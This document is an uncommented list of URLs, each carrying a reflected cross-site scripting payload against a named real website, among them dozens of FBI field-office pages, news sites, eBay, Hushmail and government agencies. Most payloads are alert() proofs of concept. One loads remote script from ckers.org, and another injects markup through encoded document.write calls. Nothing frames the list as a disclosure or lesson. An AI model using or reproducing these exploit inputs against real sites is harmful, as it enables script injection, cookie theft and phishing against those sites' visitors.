https://secure.customersvc.com/wes/servlet/Show?MSRSMAG=HA&WESTRANSITION=TRUE&PRIVACYLINK=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&NEWLINK=http%3A%2F%2Fsubs.timeinc.net%2FCampaignHandler%2FHAnb%3Fsource_id%3D8&GIFTLINK=http%3A%2F%2Fsubs.timeinc.net%2FCampaignHandler%2FHAdnr%3Fsource_id%3D3&PUBLISHER=SPC&CUSTSERVLINK=www.health.com%2Fcustomerservice&RENEWLINK=%2Fservlet%2FShow%3FWESPAGE%3Dam%2FTransactions%2FRenewal%2Frenewal.jsp%26TR%3DREN&WESJSP=T&WESTCCJSP=T&WESRENEWIMAGEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fimages%2Frenew&WESTCCIMAGEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fimages%2Ftcc&WESRENEWINCENTIVEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fam_ren%2Frenewal%2Foffers&WESRENEWINCENTIVEDIRTHANKS=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fam_ren%2Frenewal%2Foffers&WESERRORPAGE=am%2FServices%2Ferror.jsp&WESSTATEPAGE=am%2FState%2FTransactions%2Fload_home.txt&x=37&y=10 http://www.classmates.com/registration/city.jsp?cType=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&overseas=false&canada=false&sId=1&state=Ohio&cLetter=Y http://www.hellboundhackers.org/index.php?asdf'onclick=alert(String.fromCharCode(88,83,83))// http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.caterham.co.uk/register/sales.php&title=&first=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&last=&country=UNITED+KINGDOM&othercountry=&tel=&email=&add1=&add2=&add3=&add4=&town=&postcode=&passwd1=&passwd2=&submit=Submit http://www.gmc.com/vehiclelocator/gmc/locatevehicle.jsp?year=2007&modelId=none&mmc=none&brand=&originatingBrand=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E https://ssl.allegro.pl/help.php?tid=%22%3E%3Cscript%3Edocument.write(String.fromCharCode(60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,115,108,97,46,99,107,101,114,115,46,111,114,103,34,62,115,108,97,46,99,107,101,114,115,46,111,114,103,60,47,97,62))%3C/script%3E%3Cnoscript%3E http://www.swistak.pl/haslo.html?e=s1&what=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E http://www53.rockyou.com/search_main.php?s_tsearch=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&p=1 http://answercenter.ebay.pl/thread.jspa?secure%20%20%20%20';%7Dalert('make_it_e.g._eval(String.fromCharCode(...))');%7Ba='%20&threadID=1000000000&tstart=0&mod= http://hak5.podzinger.com/results.jsp?filter=0&q=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&s=PZSID_videopods_videopod0_3_7_0003&s=PZSID_pods_pod3_3_1_0007&col=en-all-pod-ep http://service.govdelivery.com/service/action/authenticate?function=login&origin=&caller=subscribe.html&code=USFBI_11&partner_id=4617&category_id=&document_id=80035&edition_id=&format=&date=&time=&cookie_check=true&refreshOpener=&nextPage=&login=Mueller%20is%20watching%20You.%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&button=Go&mailsender=default http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E https://search.putnam.com/search/perform?g_siteName=--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&g_queryText=%22%3Easdf http://www.ezinedirector.com/subscriber/index.cfm?fuseaction=s&ezineId=956605769&email=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.corpwatch.org/search.php?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Search=Submit+Query http://members.cunamutual.com/leavingcuwindow.asp?CUname=Granny+Pr%3Cscript%3Ealert(%222%20XSS%22)%3C/script%3Eon+Sites http://foia.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://www.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://boston.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://dallas.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://miami.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://sandiego.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://0-www.fbi.gov.mill1.sjlibrary.org/filelink.html?file=JAVASCRIPT:alert(document.domain%29 https://www.fbi.gov.proxy.cheri.shyou.org/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://losangeles.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://tampa.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://kansascity.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://detroit.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://newyork.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://sanantonio.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://chicago.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://stlouis.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://lasvegas.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://albany.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://atlanta.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://neworleans.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://cleveland.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://washingtondc.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://cincinnati.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://seattle.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://albuquerque.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://pittsburgh.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://oklahomacity.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://phoenix.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://springfield.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://minneapolis.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://sacramento.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://philadelphia.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://baltimore.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://houston.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://honolulu.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://denver.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://richmond.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://columbia.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://charlotte.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://portland.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://jacksonville.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://milwaukee.fbi.gov/filelink.html?file=JAVASCRIPT:alert(document.domain%29 http://www.tv4.se/tv4/billboard/ext.aspx?ref='%0a%7d%0aalert('xss')%0afunction%20a()%7ba='a&rn=209103&CID=2662 https://www.hushmail.com/hushmail/index.php?hush_username=blarg%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://ie.search.msn.com/migrate.asp?SERVER=%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx http://www.lnm.eu/newslist.html?lang=nl&ci=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22 http://www.cafepress.com/cp/search/products.aspx?fpt=__________________________a&opt=__________________________axxxx_x&q=Save%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.netelco.com/redir.php?url=http://asdf.com?%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx http://www.krha.org/goto.cfm?page=javascript:alert('XSS'%29 http://www.neoseeker.com/redirector.php?url=javascript:alert(String.fromCharCode(88,83,83%29%29 http://www.neoseeker.com/redirector.php?url=%0Ahttp://asdf.com%3F%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=&source=cnn&url=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=%27%3Balert%28%27xss%27%29%3Ba%3D%27&srchst=nyt&submit.x=0&submit.y=0&submit=sub&hdlquery=&bylquery=&daterange=full&mon1=01&day1=01&year1=1981&mon2=12&day2=03&year2=2006 http://www.britannica.com/search?query=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&ct=&searchSubmit.x=0&searchSubmit.y=0 http://www.scene.org/404-page.php?url=--%3E%3Cscript%3Ealert(/xss/);%3C/script%3E http://www.fema.gov/goodbye/goodbye.jsp?url=javascript:alert('xss'%29 http://www.citizencorps.gov/citizenCorps/goodbye.jsp?url=javascript:alert('xss'%29 http://www.atlanta-airport.com/Default.asp?url=javascript:alert(%22xss%22%29 http://www.avbpgh.com/exit.asp?url=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://www.jnj.com/exit_warning.jsp?url=http://--%3E%22%3E%3Cscript%3Ealert('xss');%3C/script%3E http://bugs.php.net/source.php?url=http://--%3E%3Cimg%20src=a%20onerror=alert(String.fromCharCode(120,115,115))%3E http://www.msnmusicexperience.nl/searchresults/search.html?searchartist=%3E%3C%22%22%3E%3Cscript%3Ealert('XSS');%3C%2Fscript%3E&cp=125 http://www.mobilemoney.com/embedcontrol.asp?url=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.beyondtrust.com/Search.aspx&Action=Execute&SearchString=%22;alert('xss')//&Search=Find